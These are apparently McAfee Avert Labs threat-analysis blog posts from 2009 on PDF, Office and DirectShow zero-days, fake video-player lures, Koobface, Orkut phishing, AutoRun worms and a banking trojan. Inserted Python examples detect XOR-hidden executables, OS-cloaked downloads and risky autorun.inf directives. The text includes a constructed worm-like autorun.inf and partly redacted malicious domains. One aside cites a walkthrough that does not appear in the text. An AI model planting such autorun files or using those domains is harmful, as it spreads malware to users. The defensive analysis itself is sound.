    As we already mentioned multiple times in the past, exploits that take advantage of newly discovered holes in popular applications represent a growing threat to Internet users. Many, if not most, computer systems are vulnerable to these attacks. More evidence shows zero-day attacks remain the preferred choice of cybercriminals.

    Today, a new unpatched Adobe vulnerability was discovered in the wild. It takes advantage of a new feature for adding interactive Flash (SWF) content to PDF files. This bug was found to affect at least Adobe Reader and Acrobat 9.1.2, as well as Adobe Flash Player 9 or later.

    In our investigation of the issue, we found that Acrobat 9 introduced a new “Rich Media” annotation type, which uses Acrobat’s built-in Flash Player to play SWF content. In the current attack, specially crafted SWF files were embedded into PDF documents. These can cause Adobe Reader to execute arbitrary code when viewed. When successful, shellcode in the exploit is executed by Adobe Reader. The picture below depicts how the shellcode works and what it does:

    Shellcode created by FWS

    It first gets a KERNEL32.dll image base using the Windows PEB structure, sets up the required Windows APIs, then decrypts and executes its malware payload. This specific malicious PDF file contains three embedded executables encoded using a simple 1-byte XOR key. When run, it drops a file called SUCHOST.EXE and sends the information gathered from the infected machine to a free host-redirection service based in China:

    • [blocked].3322.org
    • [blocked].2288.org

    The victim is then redirected to other malicious IP address(es). This malware acts as a backdoor to allow remote access to the infected computer.
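    Both the FileInsight walkthrough earlier on this page (the XOR-obfuscated executable its shellcode downloads) and this PDF case (three embedded executables encoded with a 1-byte XOR key) come down to the same analyst step: find the key and carve the file. The following Python is an added example, not FileInsight or McAfee code; the PE-shaped blob and the PDF-like carrier are constructed, and the scanner finds every (offset, key) pair by searching for the encoded MZ marker and verifying e_lfanew.

```python
"""Find and decode 1-byte-XOR-obscured PE files inside a carrier such as a PDF.
Added example, not FileInsight or McAfee code; the PE blob and carrier are constructed."""
import struct
from typing import List, Optional, Tuple

DOS_STUB_TEXT = b"This program cannot be run in DOS mode"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """True if blob starts with 'MZ' and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_xored_pe(carrier: bytes, window: int = 0x400) -> List[Tuple[int, int]]:
    """Return (offset, key) pairs where XOR-decoding the carrier yields a PE header.

    Under a fixed key 'MZ' always encodes to the same two bytes, so each key costs
    one pattern search plus a small decode per candidate, not 256 full decodes.
    Key 0 is included so unencoded executables are reported as well.
    """
    hits = []
    for key in range(256):
        marker = xor_bytes(b"MZ", key)
        pos = carrier.find(marker)
        while pos != -1:
            if looks_like_pe(xor_bytes(carrier[pos:pos + window], key)):
                hits.append((pos, key))
            pos = carrier.find(marker, pos + 1)
    return hits


def carve(carrier: bytes, offset: int, key: int, size: Optional[int] = None) -> bytes:
    """Decode the embedded file at offset; with no size, decode to the end of the carrier."""
    end = len(carrier) if size is None else offset + size
    return xor_bytes(carrier[offset:end], key)


def build_fake_pe() -> bytes:
    """Constructed PE-shaped blob: only the header fields the scanner checks are present
    (MZ, e_lfanew, DOS stub text, PE signature, i386 machine); it is not runnable code."""
    dos_header = bytearray(0x80)
    dos_header[0:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x80)            # e_lfanew -> NT headers
    dos_header[0x40:0x40 + len(DOS_STUB_TEXT)] = DOS_STUB_TEXT
    return bytes(dos_header) + b"PE\x00\x00" + struct.pack("<H", 0x014C) + b"\x00" * 18


FAKE_PE = build_fake_pe()
# Constructed carrier: PDF-like text wrapping two copies of the blob, keyed 0x5A and 0xA7.
CARRIER = (
    b"%PDF-1.6\n1 0 obj\n<< /Length 0 >>\nstream\n"
    + xor_bytes(FAKE_PE, 0x5A)
    + b"\nendstream\nendobj\n2 0 obj\nstream\n"
    + xor_bytes(FAKE_PE, 0xA7)
    + b"\nendstream\nendobj\n%%EOF\n"
)


def recover_embedded(carrier: bytes) -> List[Tuple[int, int, bool]]:
    """For each hit, report offset, key and whether the decoded data carries the DOS stub text."""
    return [(off, key, DOS_STUB_TEXT in carve(carrier, off, key, 0x400))
            for off, key in find_xored_pe(carrier)]
```

    On a real sample the carve length comes from the decoded PE headers (section table or SizeOfImage); the fixed 0x400 window here only checks that the DOS stub text survives decoding.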

    According to Adobe, the Rich Media annotation is new to Acrobat 9.x and will not be understood by PDF document viewers that can support only up to Acrobat 8 specifications. Thus, if you place the SWF file with Acrobat 9 into the PDF files, it is not readable by Acrobat or Adobe Reader 8 and older versions, and will not be vulnerable to this attack.

    Although details of this vulnerability have not yet become public, more attackers are likely to take advantage of this weakness. For McAfee customers, both the PDF and its associated payload can be proactively detected as “Exploit-PDF.t” since the 5683 DATs (released July 21).

    Even though anti-malware vendors continue to add detection for new zero-day threats, there are several things you can do to mitigate such risks. Refrain from opening attachments from untrusted sources and visiting untrustworthy web sites.

    This bug is currently being investigated by the Adobe Product Security Incident Response Team.

    (Thanks to Abhishek Karnik and Aditya Kapoor for helping to analyze the malware.)

    Malware From Celebrity Video: But I Thought I Just Installed a Video Player!

    Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

    In our world of anti-malware, we follow a simple formula: “Media + Celebrity = Watch out for malware”. Whether you are an eager fan or just someone surfing the web for news, beware. An Internet search with the right keywords on your favorite search engine can be expected to lead you to malware. In our investigation of the following case, it led us to a malicious website hosted at [removed].report-cnn.com/[removed].

    Fake Video Message

    Although it was made to look like a real one, this website is NOT related to CNN. At the time of research, it was still live and distributing malware using the “you need a video player” technique that has been used repeatedly in similar attempts in the past. With this method, the user is enticed with an attractive video but must first install a new video player program.

    The victim clicks a link that downloads and installs an executable program, which subsequently installs malware. This is usually followed by a pop-up message reporting that the downloaded video player program is corrupted!

    Install Video Player Message

    The current case comes with a slight twist. An option to download the “video player” is given only if you already have Adobe Flash installed. This first step allows users to view some initial pictures, as if they were browsing legitimate news content from the site. It then further entices users to view the “live video” by installing a video player, which instead contains malware. Once the malware is downloaded, a video is actually streamed to the user from an external link on Google. This link, of course, has nothing to do with the downloaded video player. Gullible users would actually believe that running the downloaded program enabled them to view the video.

    This malicious website recognizes the target operating system by checking the User-Agent string sent to the web server by the web browser client. In our tests, a .exe file is delivered to a Windows-based web browser while a .dmg file is delivered to Mac OS-based web browsers.
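    The User-Agent-dependent delivery described above leaves a footprint in web proxy logs: the same URL hands out differently named executables to different operating systems. The following is an added example of detection logic over such logs; it is not code from this post or from McAfee. The log layout (tab-separated timestamp, client IP, URL, status, content type, served file name, User-Agent), the host names and the log lines are all constructed for illustration.

```python
"""Flag URLs that serve a different executable depending on the client's OS.

Added example, not McAfee code.  The proxy log lines and their field layout
(timestamp, client IP, URL, status, content-type, served file name,
user agent) are constructed; host names use the reserved .test TLD.
"""
import re
from collections import defaultdict

# Constructed proxy log, tab-separated.
PROXY_LOG = """\
2009-07-20T10:01:02Z\t10.0.0.5\thttp://news.example-placeholder.test/player\t200\tapplication/octet-stream\tMediaPlayer.exe\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
2009-07-20T10:01:09Z\t10.0.0.6\thttp://news.example-placeholder.test/player\t200\tapplication/x-apple-diskimage\tMediaPlayer.dmg\tMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7) AppleWebKit/530.19 Safari/530.19
2009-07-20T10:02:30Z\t10.0.0.7\thttp://cdn.example-placeholder.test/logo.png\t200\timage/png\tlogo.png\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
2009-07-20T10:02:41Z\t10.0.0.8\thttp://cdn.example-placeholder.test/logo.png\t200\timage/png\tlogo.png\tMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7) AppleWebKit/530.19 Safari/530.19
2009-07-20T10:03:15Z\t10.0.0.9\thttp://downloads.example-placeholder.test/tool.exe\t200\tapplication/octet-stream\ttool.exe\tMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7) AppleWebKit/530.19 Safari/530.19
"""

# File extensions treated as runnable installers on the respective platforms.
EXECUTABLE_EXT = {".exe", ".dmg", ".scr", ".msi", ".pkg"}


def os_family(user_agent):
    """Coarse OS classification from the User-Agent header."""
    ua = user_agent.lower()
    if "windows" in ua:
        return "windows"
    if "mac os x" in ua or "macintosh" in ua:
        return "macos"
    if "linux" in ua:
        return "linux"
    return "other"


def parse_log(text):
    """Split the constructed log into dicts; the UA is the last field and may
    contain spaces, so the line is split on at most six tabs."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, url, status, ctype, fname, ua = line.split("\t", 6)
        rows.append({"ts": ts, "ip": ip, "url": url, "status": int(status),
                     "ctype": ctype, "fname": fname, "os": os_family(ua)})
    return rows


def find_os_cloaked_downloads(rows):
    """Return {url: {os_family: [file names]}} for URLs that served an
    executable to more than one OS family under different file names."""
    served = defaultdict(lambda: defaultdict(set))
    for r in rows:
        ext = re.search(r"\.[A-Za-z0-9]+$", r["fname"])
        if r["status"] == 200 and ext and ext.group(0).lower() in EXECUTABLE_EXT:
            served[r["url"]][r["os"]].add(r["fname"])
    flagged = {}
    for url, by_os in served.items():
        if len(by_os) > 1 and len(set().union(*by_os.values())) > 1:
            flagged[url] = {os_name: sorted(names) for os_name, names in by_os.items()}
    return flagged


if __name__ == "__main__":
    for url, by_os in find_os_cloaked_downloads(parse_log(PROXY_LOG)).items():
        print(url, by_os)
```

    Only the /player URL is reported: it returned MediaPlayer.exe to the Windows client and MediaPlayer.dmg to the Mac client, whereas tool.exe was served to a single OS family and the image was identical for both. In a real deployment the same grouping would run over a day of proxy records, and a hit is a reason to pull both artifacts for analysis.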

    Downloaded Files

    The malware downloaded from this site is currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware is detected as OSX/Puper.a Trojan. In other related cases, we currently detect the malware as Generic FakeAlert.a and Generic FakeAlert.c.

    We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

    New Wave Of Web Attacks Exploits Office

    Today, Microsoft released a security advisory on active attacks in the wild using a vulnerability in Microsoft Office Web Components. Computers with Microsoft Office features that use vulnerable versions of the Microsoft Office Web Components could be infected with malware when browsing malicious websites in Internet Explorer.

    From our investigation, Exploit-CVE2009-1136, a new zero-day exploit, was added to the web exploit toolkits that had widely deployed Exploit-MSDirectShow.b on hijacked websites in China just the previous week. Since the start of this new wave of attacks, new trojans installed by Exploit-CVE2009-1136 have been detected by Artemis technology, which also gives us a global view of the spread of this new threat.

    For one of the new trojan samples used by Exploit-CVE2009-1136, we first saw Artemis queries coming from China at 11:53 GMT on July 13th, 2009. We didn’t have automatic protection at that point, but various systems analyzing the threat details soon marked this as malicious.

    By now this sample has spread to many other Internet users in China and has been queried and blocked by Artemis more than 328 times from more than 145 unique IP addresses (ISP, not end point).

    artemis img

    Besides China, we only saw Artemis queries coming from Virus Total (Spain) and fellow malware researchers in the UK and Germany in small numbers.

    We will post more information as we receive it.

    Koobface Worm Turns Toward Twitter

    McAfee Avert Labs has received a new variant of the Koobface worm. Unlike the previous variants, this one spreads using Twitter by sending fake tweets.

    These fake tweets contain links to a video; some of these videos are named “My home video.” When users click these links they are prompted to install a video codec. However, following the instructions actually downloads a variant of the Koobface worm and installs it.

    At McAfee we detect this variant as W32/Koobface.worm.gen.e and W32/Koobface.worm.gen.h. The detection for this variant will be available to the public in today’s release (DAT 5675).

    An Artemis View of Zero-Day Attacks

    In our blog from yesterday, we described how Exploit-MSDirectShow.b has been widely deployed on hijacked websites in China, targeting Internet Explorer users. When a victim browses one of these sites, malware is downloaded to the computer. To better understand the current impact of these attacks, we have monitored the prevalence of its downloaded malware through Artemis.

    Since yesterday, our Artemis technology has detected new malware installed by Exploit-MSDirectShow.b that was targeted to certain geographical regions of the world.

    In China, a new sample variant was queried by Artemis more than 180 times at more than 70 unique IP addresses (ISP, not end point) over a 24-hour period. This is represented by the many red dots in the following figure:

    artemis

    This particular sample was first seen only in mainland China, but we soon saw Artemis queries from Korea, Japan, Australia, Singapore, Taiwan, and the United States in very small numbers. As we know, the web has no boundaries, and the potential risks of the DirectShow zero-day vulnerability are not limited to specific languages or regions. We will closely monitor this trend.
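    Both this post and the Office Web Components post above summarize cloud-lookup telemetry the same way: when a hash was first queried, how many times, from how many distinct addresses, and from which countries in what order. The following added example computes exactly that summary; it is not McAfee's Artemis code. The records, their field layout, the placeholder hashes and the RFC 5737 documentation addresses are all constructed.

```python
"""Prevalence summary for one sample hash from cloud-lookup telemetry.

Added example, not McAfee's Artemis code.  Records are constructed tuples of
(UTC timestamp, file hash, source IP, country); hashes are placeholders and
addresses come from the RFC 5737 documentation ranges.
"""
from datetime import datetime

TELEMETRY = [
    ("2009-07-13 11:53:00", "PLACEHOLDER_HASH_A", "203.0.113.10", "CN"),
    ("2009-07-13 09:00:00", "PLACEHOLDER_HASH_B", "203.0.113.10", "CN"),
    ("2009-07-13 11:55:10", "PLACEHOLDER_HASH_A", "203.0.113.10", "CN"),
    ("2009-07-13 16:45:00", "PLACEHOLDER_HASH_A", "192.0.2.30", "GB"),
    ("2009-07-13 12:10:00", "PLACEHOLDER_HASH_A", "203.0.113.44", "CN"),
    ("2009-07-13 14:30:00", "PLACEHOLDER_HASH_A", "192.0.2.9", "ES"),
    ("2009-07-13 12:40:00", "PLACEHOLDER_HASH_A", "198.51.100.7", "CN"),
]


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def summarize(records, file_hash):
    """Return first-seen time, query count, unique source count, hourly
    counts and a per-country breakdown for one hash, or None if unseen."""
    hits = sorted((r for r in records if r[1] == file_hash),
                  key=lambda r: _parse(r[0]))
    if not hits:
        return None
    by_country, per_hour = {}, {}
    for ts, _, ip, cc in hits:
        # hits are time-ordered, so the first record per country is its first sighting
        entry = by_country.setdefault(cc, {"first_seen": ts, "queries": 0, "ips": set()})
        entry["queries"] += 1
        entry["ips"].add(ip)
        hour = _parse(ts).strftime("%Y-%m-%d %H:00")
        per_hour[hour] = per_hour.get(hour, 0) + 1
    return {
        "first_seen": hits[0][0],
        "queries": len(hits),
        "unique_ips": len({r[2] for r in hits}),
        "per_hour": per_hour,
        "by_country": {
            cc: {"first_seen": e["first_seen"], "queries": e["queries"],
                 "unique_ips": len(e["ips"])}
            for cc, e in by_country.items()
        },
    }


def spread_order(summary):
    """Countries in the order the sample was first observed in them."""
    return sorted(summary["by_country"],
                  key=lambda cc: _parse(summary["by_country"][cc]["first_seen"]))


if __name__ == "__main__":
    s = summarize(TELEMETRY, "PLACEHOLDER_HASH_A")
    print(s["first_seen"], s["queries"], s["unique_ips"])
    print(spread_order(s), s["by_country"])
```

    On the constructed records the sample is first seen at 11:53 in China, collects six queries from five distinct addresses, and then appears in Spain and the United Kingdom in single queries, which is the "first in one region, then trickling into others" pattern both posts describe. Counting unique source addresses rather than raw queries matters because one address can represent an ISP resolver or a research lab retrying the same lookup.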

    This sample is already heuristically detected in the DATs and Artemis. After our analysis, it has now been classified as Downloader-BRT Trojan.

    McAfee Coverage of the DirectShow Exploit

    Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates for many of our products and technologies.

    Current status for each of the content areas:

    • Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
    • HIPS: Generic buffer overflow should provide coverage
    • McAfee Network Security Platform: Coverage was provided on July 6
    • McAfee Vulnerability Manager: Coverage was provided on July 6
    • MNAC: Coverage will be provided in the next release
    • VirusScan Enterprise: Buffer overflow protection should provide coverage
    • McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

    Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack:

    We will continue to monitor the situation to provide comprehensive coverage.

    New Attacks Against Internet Explorer

    If you read Geok Meng and Xiaobo’s blog published in December last year, this must almost seem like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft DirectShow ActiveX object was widely discovered on many Chinese websites.

    At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.

    When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.

    During research, one of the things we found interesting was that the web exploit toolkit explicitly checks that the origin of the hyperlinked references does not come from the “.gov.cn” and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the references do not come from either of these domains, it starts sending a cocktail of exploits including:

    • Exploit-MSDirectShow.b (zero-day)
    • Exploit-XMLhttp.d
    • Exploit-RealPlay.a
    • JS/Exploit-BBar
    • Exploit-MS06-014

    Each of these exploits targets a different application that could be vulnerable–Internet Explorer 6 and 7, DirectShow ActiveX, RealPlayer, Baidu Toolbar–that can be accessed via the Internet Explorer browser.

    From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.

    When successful, the attacker installs a downloader Trojan that could download other malware.

    This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. In IE 7 on Windows Vista, however, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.

    The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).

    We will post more information as we receive it.

    (Thanks to our colleague Wei Wang for assistance in this analysis.)

    Michael Jackson News Affects Web Traffic

    The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

    Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

    How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

    As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

    Bad News Offers Opportunity to Spread Malware

    With the current news about the deaths of Farrah Fawcett and Michael Jackson, it’s a good idea to remind our readers to beware of blackhat attempts to distribute malware to anyone looking for news.

    Every time a disaster happens or news about some celebrity reaches the media, malware writers try to take advantage of it. The most common attack vector is email. Watch out for spam offering links to “news” or “pictures” of deceased celebrities. Most of the time, they will take you to websites offering advertisements for pharmacy products such as Viagra and Cialis or, even worse, will try to install malware on your machine!

    But another way to attract visitors looking for news is a technique known as search engine optimization (SEO for short, see more here). Blackhats use SEO to inflate search engine results in an attempt to put their results on top of the list and drive more users to fake websites offering “more information” about the current trendy news. When the users click on the fake links, they are susceptible to any kind of attack, spyware or malware installation, or information theft.

    A good way to protect against this kind of attack is to use our SiteAdvisor tool, which can be downloaded for free at this site: http://www.siteadvisor.com/. It will help you identify potentially malicious links on your search results.

    And again, repeat with me: No, that email will NOT show you pictures of Michael Jackson’s body; it will just install malware on your machine.

    Sex the Bait in Mass Orkut Compromise

    With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish for personal information, as well as MySpace scams and Facebook spam.

    With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not-so-tech-savvy users on Orkut. They have updated the user profiles of several thousand compromised Orkut accounts, which now link to various phishing websites. These lure visiting users into divulging their personal information.

    Various phishing websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousand Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.


    We have observed scores of websites being used in this phishing attack. Here are a few of them:

    • http://orkutsexlogi[blocked].tk
    • http://s3x[blocked].kilu.de
    • http://orkutst[blocked].tk
    • http://album[blocked].kilu.de
    • http://priya[blocked].freehostia.com

    If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

    Worms Dig Further Than Thumb Drives

    Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

    Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

    So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

    Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

    A) Most USB devices that you can plug into your computer that have storage

    If you answered A, you’re right! (That wasn’t hard, was it?)

    How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

    How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

    Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

    But going down the road to prevention, however, is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRuns can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

    Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

    If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

    That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”
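    The file the post closes on, autorun.inf, is a plain INI file, and the directives that let it start a program are few and well known, so an administrator can triage one before a device is shared. The following is an added example of such a check; it is not McAfee code. Both sample files and the paths inside them are constructed for illustration.

```python
"""Check an autorun.inf for directives that make Windows run a program when a
drive is inserted or double-clicked.

Added example, not McAfee code.  Both sample files below are constructed;
the paths and labels in them are made up.
"""

# Constructed: a harmless autorun.inf that only sets a label and an icon.
BENIGN_AUTORUN = r"""
[autorun]
icon=setup.exe,0
label=Holiday Photos
"""

# Constructed: the shape of file an AutoRun worm typically drops.
WORMLIKE_AUTORUN = r"""
[AutoRun]
open=data\update.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
shell\open\command=data\update.exe
shell\explore\command=data\update.exe
shell=open
"""

# Keys whose value Windows executes directly on AutoPlay.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Minimal INI parser: {section: {key: value}}, names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def assess_autorun(text):
    """Return (section, key, value, reason) tuples; an empty list means the
    file cannot make Windows start a program by itself."""
    findings = []
    for section, keys in parse_autorun(text).items():
        if not section.startswith("autorun"):
            continue
        for key, value in keys.items():
            if key in LAUNCH_KEYS:
                findings.append((section, key, value,
                                 "runs a program when the drive is inserted"))
            elif key.startswith("shell\\") and key.endswith("\\command"):
                findings.append((section, key, value,
                                 "attaches a program to a context-menu verb"))
            elif key == "shell":
                findings.append((section, key, value,
                                 "changes which verb a double-click runs"))
            elif key == "icon" and "shell32.dll" in value.lower():
                findings.append((section, key, value,
                                 "borrows a system icon, often to look like a folder or drive"))
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_AUTORUN), ("worm-like", WORMLIKE_AUTORUN)):
        print(name)
        for finding in assess_autorun(sample):
            print("  ", finding)
```

    The benign file produces no findings; the worm-like one is flagged five times, once per directive, including the `shell\explore\command` override that catches users who right-click and choose Explore to "safely" look inside the drive. The check complements, rather than replaces, the mitigations the post lists: with AutoPlay disabled for removable drives, none of these directives fire on insertion.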

    Dumb Malware Authors Cause More Damage Than Smart Ones

    I don’t really know which is worse: a dumb or a smart malware writer.

    Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

    While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

    Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

    Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

    What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.
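    Because the connection string sits in the binary as a plain string, the "checking" the post refers to can be automated: extract every OLE DB/ADO connection string from a file image and report whether it carries credentials. The following added triage script is not McAfee code. Its sample bytes, host names and credentials are constructed placeholders, and it also handles the UTF-16 wide strings that Windows malware often stores, which is an assumption about how such samples are built rather than something this post states.

```python
"""Pull OLE DB/ADO connection strings out of a file image and report whether
they embed credentials.

Added triage example, not McAfee code.  The sample bytes, host names and
credentials are constructed; one string is stored as UTF-16-LE because many
Windows binaries keep their strings in that encoding (an assumption).
"""
import re

_WIDE = ("Provider=SQLOLEDB.1;Data Source=wide.placeholder.test;"
         "User ID=PLACEHOLDER_USER;Password=PLACEHOLDER_PW").encode("utf-16-le")

# Constructed "binary": header bytes, filler, then three connection strings.
SAMPLE = (
    b"MZ\x90\x00" + bytes(range(256))
    + b"Provider=SQLOLEDB.1;Password=PLACEHOLDER_PW;Persist Security Info=True;"
    b"User ID=PLACEHOLDER_USER;Initial Catalog=PLACEHOLDER_DB;"
    b"Data Source=sql.placeholder.test;Packet Size=10000\x00"
    + b"\x00" * 32
    + b"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=C:\\data\\local.mdb\x00"
    + b"\x00" * 8 + _WIDE + b"\x00\x00"
)

# "Provider=" up to the next NUL or line break (narrow strings) ...
ASCII_RE = re.compile(rb"Provider=[^\x00\r\n]{1,512}")
# ... and the same prefix with a NUL after every printable byte (UTF-16-LE).
WIDE_RE = re.compile(rb"P\x00r\x00o\x00v\x00i\x00d\x00e\x00r\x00=\x00(?:[\x20-\x7e]\x00){1,512}")
SECRET_KEYS = {"password", "pwd", "user id", "uid"}


def extract_connection_strings(blob):
    """Return each connection string as {lower-cased key: value}."""
    found = [m.group(0).decode("latin-1") for m in ASCII_RE.finditer(blob)]
    found += [m.group(0).decode("utf-16-le") for m in WIDE_RE.finditer(blob)]
    parsed = []
    for text in found:
        fields = {}
        for part in text.split(";"):
            key, sep, value = part.partition("=")
            if sep:
                fields[key.strip().lower()] = value.strip()
        parsed.append(fields)
    return parsed


def triage(blob):
    """One finding per connection string, with secret values redacted so the
    report itself does not leak what the sample leaks."""
    findings = []
    for fields in extract_connection_strings(blob):
        findings.append({
            "provider": fields.get("provider"),
            "data_source": fields.get("data source"),
            "hardcoded_credentials": any(k in fields for k in ("password", "pwd")),
            "report": {k: ("<redacted>" if k in SECRET_KEYS else v)
                       for k, v in fields.items()},
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding["provider"], finding["data_source"],
              "credentials" if finding["hardcoded_credentials"] else "no credentials")
```

    Run against the constructed image it reports three strings: the SQL Server one with an embedded password, a local Jet database with none, and the wide-string SQL Server one, again with a password. The redaction in the report is deliberate: an analyst's notes travel further than the sample does, and the whole point of the post is that those credentials open the victims' data to anyone who reads them.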

    Yes, it is just another password-stealing Trojan. No need to get too excited. :) And, yes, we already detect this malware–as PWS-Banker.gen.i.

    Avoid Housecalls From Rogue ‘Malware Doctor’

    Yesterday, we came across a new variant of a rogue security program. This one is called Malware Doctor, and we detect it as FakeAlert-D Trojan with our DAT 5635.

    The new variant comes from the following web pages:
    hxxp://internetware-sa{blocked}.com/
    hxxp://mal-ware{blocked}.net

    As do most other rogue security programs, Malware Doctor displays misleading fake alerts to entice users into buying a product to “repair” malware problems.

    We also noticed some new features in Malware Doctor. Once installed, it performs a system scan:

    maldoc1

    Users see a message indicating this “unregistered” version of Malware Doctor won’t be able to heal or remove infected files and asking the user to activate it at a cost.

    maldoc2

    maldoc3

    Unlike many rogue security programs, which display excessive fake alerts, this version of Malware Doctor reports only a few detections, so users will not be very suspicious of it.

    Once this Trojan detects a supposedly malicious file, it will pop up a message:

    maldoc4

    This Trojan even makes use of McAfee’s malware naming convention:

    maldoc6

    This Trojan also displays information about supposedly known viruses, taken from McAfee’s Virus Information Library.

    maldoc5

    As of today, the malicious website hosting this Trojan makes use of another AV vendor’s malware naming convention. However, the installer for this Trojan no longer exists on the Trojan’s website.

    Affected VirusScan users may remove this threat using the latest DATs and engine.

    Keep your AV signatures up to date!

